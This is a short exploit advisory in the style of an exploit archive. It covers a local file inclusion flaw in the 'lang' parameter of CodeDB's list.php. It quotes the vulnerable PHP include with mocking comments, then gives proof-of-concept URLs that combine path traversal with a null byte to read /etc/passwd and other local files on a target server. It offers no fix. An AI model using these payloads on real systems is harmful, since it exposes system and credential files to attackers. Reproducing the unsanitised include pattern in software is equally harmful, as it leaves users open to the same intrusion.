###############################################################################
#
#   Name    :   CodeDB (list.php lang) Local File Inclusion Vulnerability
#   Author  :   cOndemned
#   Greetz  :   ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################

Source :

    // list.php
    
    2.  $lang = htmlspecialchars($_GET['lang']);            // ok, but.... for what ? lol
    
    7.  if(file_exists('templates/'.$lang.'_middle.php'))   // We'll have to cut off rest of filename & extension
	8.      include('templates/'.$lang.'_middle.php');      // Ekhm... pwned ;d
    
    
Proof of Concept :

    http://[host]/[codeDB_path]/list.php?lang=../readme.txt%00
    http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd%00
    http://[host]/[codeDB_path]/list.php?lang=../[local_file]%00

    
EoF.